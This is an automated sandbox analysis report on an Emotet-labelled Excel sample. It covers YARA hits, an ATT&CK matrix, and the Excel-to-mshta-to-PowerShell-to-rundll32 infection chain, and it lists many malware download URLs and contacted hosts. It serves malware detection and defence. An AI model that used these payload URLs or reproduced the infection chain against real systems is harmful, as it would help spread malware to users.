                            Source: Yara matchFile source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562407 Sample: DETAILS-145.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->49 51 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->51 53 31 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\DETAILS-145.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.168, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 jeffreylubin.igclout.com 74.208.236.157, 49170, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->57 59 kuyporn.com 172.67.149.209, 49169, 80 CLOUDFLARENETUS United States 23->59 45 C:\ProgramData\QWER.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\cekfidpy.yhq (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            DETAILS-145.xls35%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\QWER.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            12.2.rundll32.exe.25f0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            18.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2810000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2320000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.23e0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a40000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.910000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.140000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2670000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.380000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2380000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2e80000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            19.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2380000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2f40000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            19.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a70000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.25c0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.5f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2860000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2410000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e40000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2590000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.230000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.24d0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.a60000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2350000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.26b0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            18.2.rundll32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2280000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3d0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2ed0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.8a0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.820000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2e20000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.31d0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2fd0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.910000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.220000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.170000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2730000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2eb0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2250000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.23d0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3170000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.770000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.370000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.ae0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.7a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2f30000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.27a0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.400000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e70000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2960000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.28e0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3d0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.8e0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.22b0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2e50000.10.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://kuyporn.com/wp-content/XS100%Avira URL Cloudmalware
                            http://piriform.comk0%Avira URL Cloudsafe
                            http://docs-construction.com/wp-admin/JJEf0kEA5/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlWinSta0100%Avira URL Cloudmalware
                            https://algzor.c0%Avira URL Cloudsafe
                            http://91.240.118.168/qqw/aas/se.htmlfunction100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/w100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlv1.0100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3100%Avira URL Cloudmalware
                            http://kuyporn.c0%Avira URL Cloudsafe
                            https://elroieyecentre.org/cgi-b100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/wp-admin/vzOG/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.168/qqw/aas/se.html~(100%Avira URL Cloudmalware
                            http://kuyporn.com/wp-content/XSs5/100%Avira URL Cloudmalware
                            http://docs-construction.com/wp-admin/JJEf0kEA5/100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/2TjUH/100%Avira URL Cloudmalware
                            http://wallacebradley.com/css/Yc100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.pngPE3100%Avira URL Cloudmalware
                            http://wallacebradley.com/css/YcDc927SJR/100%Avira URL Cloudmalware
                            https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3100%Avira URL Cloudmalware
                            https://algzor.com/wp-includes/g100%Avira URL Cloudmalware
                            http://www.protware.comth4cM0%Avira URL Cloudsafe
                            http://wallacebradley.com/css/YcDc927SJR/PE3100%Avira URL Cloudmalware
                            http://www.%s.comPA0%URL Reputationsafe
                            http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html100%Avira URL Cloudmalware
                            http://docs-construction.com/wp-0%Avira URL Cloudsafe
                            https://bluwom-milano.com/wp-content/FEj3y4z/100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-includes/W7qXVeGp/100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp-includes/KaWZp0odkEO/100%Avira URL Cloudmalware
                            http://kuyporn.com100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlNE100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/2TjUH/PE3100%Avira URL Cloudmalware
                            http://kuyporn.com/wp-content/XSs5/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.html100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlB100%Avira URL Cloudmalware
                            https://bluwom-milano.com/wp-con100%Avira URL Cloudmalware
                            https://bluwom-milano.com/wp-content/FEj3y4z/PE3100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com100%Avira URL Cloudmalware
                            https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/100%Avira URL Cloudmalware
                            http://www.protware.com0%URL Reputationsafe
                            http://91.240.118.168/qqw/aas/se.html&E100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmln100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.png100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmls100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlC:100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-inclu100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/100%Avira URL Cloudmalware
                            http://91.240.118.168100%URL Reputationmalware
                            https://algzor.com/wp-includes/ghFXVrGLEh/PE3100%Avira URL Cloudmalware
                            https://algzor.com/wp-includes/ghFXVrGLEh/100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlmshta100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            kuyporn.com
                            		172.67.149.209
                            		truefalse
                              		unknown
                              jeffreylubin.igclout.com
                              		74.208.236.157
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://jeffreylubin.igclout.com/wp-admin/vzOG/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://kuyporn.com/wp-content/XSs5/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmltrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.pngtrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://kuyporn.com/wp-content/XSpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://piriform.comkpowershell.exe, 00000006.00000002.682272130.00000000002D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://docs-construction.com/wp-admin/JJEf0kEA5/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmlWinSta0mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://algzor.cpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmlfunctionmshta.exe, 00000004.00000003.432443506.00000000024AD000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://grupomartinsanchez.com/wpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmlv1.0mshta.exe, 00000004.00000003.451477206.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454957215.0000000002E41000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://kuyporn.cpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://elroieyecentre.org/cgi-bpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.11powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: safe
                                		low
                                http://91.240.118.168/qqw/aas/se.html~(mshta.exe, 00000004.00000002.454744998.00000000003E6000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://docs-construction.com/wp-admin/JJEf0kEA5/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://flybustravel.com/cgi-bin/2TjUH/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://wallacebradley.com/css/Ycpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.pngPE3powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://wallacebradley.com/css/YcDc927SJR/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://algzor.com/wp-includes/gpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.protware.comth4cMmshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://wallacebradley.com/css/YcDc927SJR/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.%s.comPArundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.htmlmshta.exe, 00000004.00000003.431930961.00000000024A5000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://docs-construction.com/wp-powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bluwom-milano.com/wp-content/FEj3y4z/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://esaci-egypt.com/wp-includes/W7qXVeGp/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://thaireportchannel.com/wp-includes/KaWZp0odkEO/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://kuyporn.compowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmlNEmshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://flybustravel.com/cgi-bin/2TjUH/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://kuyporn.com/wp-content/XSs5/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://91.240.118.168/qqw/aas/se.htmlBDETAILS-145.xls.0.drtrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://bluwom-milano.com/wp-conpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://bluwom-milano.com/wp-content/FEj3y4z/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://jeffreylubin.igclout.compowershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
